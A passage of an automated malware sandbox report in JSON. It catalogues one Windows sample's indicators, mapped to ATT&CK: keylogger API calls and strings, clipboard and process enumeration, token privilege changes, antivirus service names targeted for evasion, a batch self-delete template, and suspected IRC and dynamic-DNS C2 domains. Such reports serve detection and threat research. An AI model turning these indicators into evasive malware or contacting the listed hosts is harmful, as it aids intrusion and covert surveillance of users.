\"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-83", "type": 2, "relevance": 1, "name": "Contains ability to enumerate files on disk (API string)", "description": "Found reference to API \"FindFirstFileA\" (Indicator: \"FindFirstFile\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"FindNextFileA\" (Indicator: \"FindNextFile\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"FindNextFileA\" (Indicator: \"FindNextFile\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"FindFirstFileA\" (Indicator: \"FindFirstFile\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"GetEnvironmentStringsW\" (Indicator: \"GetEnvironmentStrings\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetEnvironmentStrings\" (Indicator: \"GetEnvironmentStrings\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")\n Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"GetEnvironmentStringsW\" (Indicator: \"GetEnvironmentStrings\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"GetEnvironmentStrings\" (Indicator: \"GetEnvironmentStrings\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-122", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the NetBIOS name of the local computer (API string)", "description": "Found reference to API \"GetComputerNameA\" (Indicator: \"GetComputerName\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetComputerNameA\" (Indicator: \"GetComputerName\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-107", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the host's architecture (API string)", "description": "Found reference to API \"GetEnvironmentVariableA\" (Indicator: \"GetEnvironmentVariable\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetEnvironmentVariableA\" (Indicator: \"GetEnvironmentVariable\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-188", "type": 2, "relevance": 1, "name": "Contains ability to access clipboard data (API string)", "description": "Found reference to API \"GetClipboardData\" (Indicator: \"GetClipboardData\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"OpenClipboard\" (Indicator: \"OpenClipboard\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetClipboardData\" (Indicator: \"GetClipboardData\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"OpenClipboard\" (Indicator: \"OpenClipboard\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-224", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the local name for a socket (API string)", "description": "Found reference to API \"getsockname\" (Indicator: \"getsockname\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")", "origin": "File/Memory", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-205", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the time elapsed since the system was started (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-88", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about pressed keystrokes (API string)", "description": "Found reference to API \"GetAsyncKeyState\" (Indicator: \"GetAsyncKeyState\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetAsyncKeyState\" (Indicator: \"GetAsyncKeyState\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-86", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about operating system (API string)", "description": "Found reference to API \"2757963512,5336,3025,,RtlGetNtProductType,NTDLL.dll,\"252:21:42.679\",RX=0,PX=0\" (Indicator: \"RtlGetNtProductType\"; Source: \"00000000-00005224.00000000.139255.00220000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-532", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the host name of a computer (API string)", "description": "Found reference to API \"gethostname\" (Indicator: \"gethostname\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-517", "type": 2, "relevance": 1, "name": "Contains ability to enumerate running processes using Tasklist", "description": "Observed string: \"tasklist.exe\" [Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d]\n Observed string: \"tasklist.exe\" [Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp]", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-556", "type": 2, "relevance": 1, "name": "Found strings related to keylogger", "description": "Found string \"[BACK]\" (Indicator: \"[Back]\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"[TAB]\" (Indicator: \"[tab]\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"[BACK]\" (Indicator: \"[Back]\"; Source: \"00000000-00005224.00000000.139261.00423000.00000040.mdmp\")\n Found string \"[TAB]\" (Indicator: \"[tab]\"; Source: \"00000000-00005224.00000000.139261.00423000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-88", "relevance": 1, "name": "Imports GetCommandLine API", "description": "Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d]", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-210", "type": 2, "relevance": 1, "name": "Contains ability to create/connect to a named pipe (API string)", "description": "Found reference to API \"CreatePipe\" (Indicator: \"CreatePipe\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"PeekNamedPipe\" (Indicator: \"PeekNamedPipe\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"CreatePipe\" (Indicator: \"CreatePipe\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"PeekNamedPipe\" (Indicator: \"PeekNamedPipe\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-537", "type": 2, "relevance": 1, "name": "Contains ability to create a new HTTP request (API string)", "description": "Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-228", "type": 2, "relevance": 1, "name": "Contains ability to communicate with C2 using Sockets (API string)", "description": "Found reference to API \"WSAStartup\" (Indicator: \"WSAStartup\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")", "origin": "File/Memory", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Heuristic match: \"irc.quakenet.org\"\n Heuristic match: \"us.quakenet.org\"\n Heuristic match: \"hwinfoq.com\"\n Heuristic match: \"dogz.mooo.com\"\n Heuristic match: \"evil.mooo.com\"\n Heuristic match: \"fli4l.mooo.com\"\n Heuristic match: \"tippspiel.mooo.com\"\n Heuristic match: \"bullock.mooo.com\"\n Heuristic match: \"666.afraid.org\"\n Heuristic match: \"nightwish.afraid.org\"\n Heuristic match: \"foenix.afraid.org\"\n Heuristic match: \"i.am.not.afraid.org\"\n Heuristic match: \"be.very.afraid.org\"\n Heuristic match: \"nin.afraid.org\"\n Heuristic match: \"codebytesdev.afraid.org\"\n Heuristic match: \"rizahnst.afraid.org\"\n Heuristic match: \"lwser.mooo.com\"\n Heuristic match: \"franck78.afraid.org\"\n Heuristic match: \"eventhorizon.no-ip.org\"\n Heuristic match: \"gacw.no-ip.org\"\n Heuristic match: \"kylodee.afraid.org\"\n Heuristic match: \"janning.no-ip.org\"\n Heuristic match: \":irc.afraid.org\"\n Heuristic match: \"co.uk\"\n Heuristic match: \"windowsupdate.com\"\n Pattern match: \"www.windowsupdate.com\"\n Heuristic match: \"v5windowsupdate.microsoft.nsatc.net\"\n Pattern match: \"www3.ca.com\"\n Pattern match: \"www.ravantivirus.com\"\n Pattern match: \"www.bitdefender.com\"\n Pattern match: \"www.pandasoftware.com\"\n Heuristic match: \"housecall.trendmicro.com\"\n Pattern match: \"www.trendmicro.com\"\n Heuristic match: \"trendmicro.com\"\n Pattern match: \"www.nai.com\"\n Heuristic match: \"nai.com\"\n Heuristic match: \"secure.nai.com\"\n Pattern match: \"www.my-etrust.com\"\n Heuristic match: \"my-etrust.com\"\n Heuristic match: \"ca.com\"\n Pattern match: \"www.ca.com\"\n Heuristic match: \"networkassociates.com\"\n Pattern match: \"www.networkassociates.com\"\n Heuristic match: \"avp.com\"\n Pattern match: \"www.kaspersky.com\"\n Pattern match: \"www.avp.com\"\n Heuristic match: \"kaspersky.com\"\n Pattern match: \"www.f-secure.com\"\n Heuristic match: \"f-secure.com\"\n Heuristic match: \"viruslist.com\"\n Pattern match: \"www.viruslist.com\"\n Heuristic match: \"sophos.com\"\n Pattern match: \"www.sophos.com\"\n Heuristic match: \"us.mcafee.com\"\n Heuristic match: \"mcafee.com\"\n Pattern match: \"www.mcafee.com\"\n Heuristic match: \"symantec.com\"\n Heuristic match: \"securityresponse.symantec.com\"\n Pattern match: \"www.symantec.com\"\n Heuristic match: \".co.uk\"\n Heuristic match: \"yahoo.com\"\n Heuristic match: \"aol.com\"\n Heuristic match: \"mail.com\"\n Heuristic match: \"hotmail.com\"\n Heuristic match: \"t.com\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-539", "type": 2, "relevance": 1, "name": "Contains reference to Windows internet services (API string)", "description": "Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-419", "type": 2, "relevance": 1, "name": "Contains ability to open a port and listen for incoming connection (API string)", "description": "Found reference to API \"setsockopt\" (Indicator: \"setsockopt\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")", "origin": "File/Memory", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-601", "type": 2, "relevance": 1, "name": "Contains ability to communicate with network (API string)", "description": "Found reference to API \"HttpSendRequestA\" (Indicator: \"HttpSendRequest\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"WSAStartup\" (Indicator: \"WSAStartup\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"HttpSendRequestA\" (Indicator: \"HttpSendRequest\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-241", "type": 2, "relevance": 1, "name": "Contains ability to download a file from a URL (API string)", "description": "Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-538", "type": 2, "relevance": 1, "name": "Contains ability to create a HTTP or FTP session (API string)", "description": "Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-457", "type": 2, "relevance": 1, "name": "Found string related to HTTP headers", "description": "Found string \"%s %s HTTP/1.1Referer: %sHost: %sConnection: close\" (Indicator: \"HTTP/1.1\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"%s %s HTTP/1.1\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-408", "type": 2, "relevance": 1, "name": "Contains ability to delete files", "description": "Observed string: \"@echo off%s > \"%s\"del \"%s\"\" (Indicator: \"\"del \") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n Observed string: \"@echo off%s > \"%s\"del \"%s\"del \"%s\"\" (Indicator: \"\"del \") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d", "origin": "File/Memory", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-474", "type": 2, "relevance": 1, "name": "Contains ability to access device drivers", "description": "Found string \"\\drivers\\etc\\hosts\" (Indicator: \"\\drivers\\\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"\\drivers\\etc\\hosts\" (Indicator: \"\\drivers\\\"; Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-230", "type": 2, "relevance": 1, "name": "Contains ability to delete registry key/value (API string)", "description": "Found reference to API \"RegDeleteKeyA\" (Indicator: \"RegDeleteKey\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"RegDeleteValueA\" (Indicator: \"RegDeleteValue\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"RegDeleteKeyA\" (Indicator: \"RegDeleteKey\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"RegDeleteValueA\" (Indicator: \"RegDeleteValue\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-77", "type": 2, "relevance": 1, "name": "Contains ability to modify access token privileges (API string)", "description": "Found reference to API \"LookupPrivilegeValueA\" (Indicator: \"LookupPrivilegeValue\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"AdjustTokenPrivileges\" (Indicator: \"AdjustTokenPrivileges\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"SeDebugPrivilege\" (Indicator: \"SeDebugPrivilege\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"LookupPrivilegeValueA\" (Indicator: \"LookupPrivilegeValue\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"AdjustTokenPrivileges\" (Indicator: \"AdjustTokenPrivileges\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"SeDebugPrivilege\" (Indicator: \"SeDebugPrivilege\"; Source: \"00000000-00005224.00000000.139261.00423000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-308", "type": 2, "relevance": 1, "name": "Contains ability to delete files/directories (API string)", "description": "Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"RemoveDirectoryA\" (Indicator: \"RemoveDirectory\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"RemoveDirectoryA\" (Indicator: \"RemoveDirectory\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-316", "type": 2, "relevance": 1, "name": "Contains ability to terminate a process (API string)", "description": "Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-535", "type": 2, "name": "Contains ability to write files (API string)", "description": "Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-134", "type": 2, "relevance": 3, "name": "Found anti-virus related strings names", "description": "Found string \"SymProxySvc\" (Indicator: \"symproxysvc\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"Norton Antivirus Server\" (Indicator: \"norton\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"NISUM\" (Indicator: \"nisum\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"NISSERV\" (Indicator: \"nisserv\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"navapsvc\" (Indicator: \"navapsvc\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"McShield\" (Indicator: \"mcshield\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"DefWatch\" (Indicator: \"defwatch\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"ccEvtMgr\" (Indicator: \"ccevtmgr\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"BlackICE\" (Indicator: \"blackice\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"AvSynMgr\" (Indicator: \"avsynmgr\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"AVPCC\" (Indicator: \"avpcc\"; File: 